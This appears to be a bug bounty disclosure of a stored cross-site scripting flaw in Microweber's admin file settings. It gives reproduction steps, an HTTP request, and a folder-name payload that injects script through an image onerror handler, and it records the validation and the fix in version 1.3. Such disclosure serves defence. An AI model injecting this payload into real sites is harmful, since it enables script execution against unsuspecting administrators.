Cross-site Scripting (XSS) - Stored in microweber/microweber


Reported on

Feb 22nd 2022


I found a Stored XSS vulnerability at admin page:

Proof of Concept

Step 1: Go to Settings > Website settings > Files
Step 2: Create new folder with folder name : <img scr=0 onerror=alert(1)>

// Request
POST /demo/api/create_media_dir HTTP/1.1
Cookie: back_to_admin=https%3A//; csrf-token-data=%7B%22value%22%3A%22CWFoo1r5aSs0Eh43ggbPh7ZrADzLJq9pqxcn2oVo%22%2C%22expiry%22%3A1645524272281%7D; mw-back-to-live-edit=true; show-sidebar-layouts=0; laravel_session=pnfZUavpfYyBW2Nem7BpY0Ove87uyklKnGMAZgpA; remember_web_59ba36addc2b2f9401580f014c7f58ea4e30989d=2%7CRrQ72IHSMWcZZ25VCSQGCbqyg25qhWmSDCJNwDVH4X3Z736hG3mxHR05oNrZ%7C%242y%2410%24114oPbqv.UAg3ca706prIuSTMe3pAc9qYqT2gOBR1uldB9UTk%2FlYu
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 60
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
Connection: close


Step3: After create folder successful, see alert popup

Alert popup:


This vulnerability is capable of stored XSS

We are processing your report and will contact the microweber team within 24 hours. 2 years ago
We have contacted a member of the microweber team and are waiting to hear back 2 years ago
Bozhidar Slaveykov validated this vulnerability 2 years ago
tuonggg has been awarded the disclosure bounty
The fix bounty is now up for grabs
Bozhidar Slaveykov marked this as fixed in 1.3 with commit c897d0 2 years ago
Bozhidar Slaveykov has been awarded the fix bounty
to join this conversation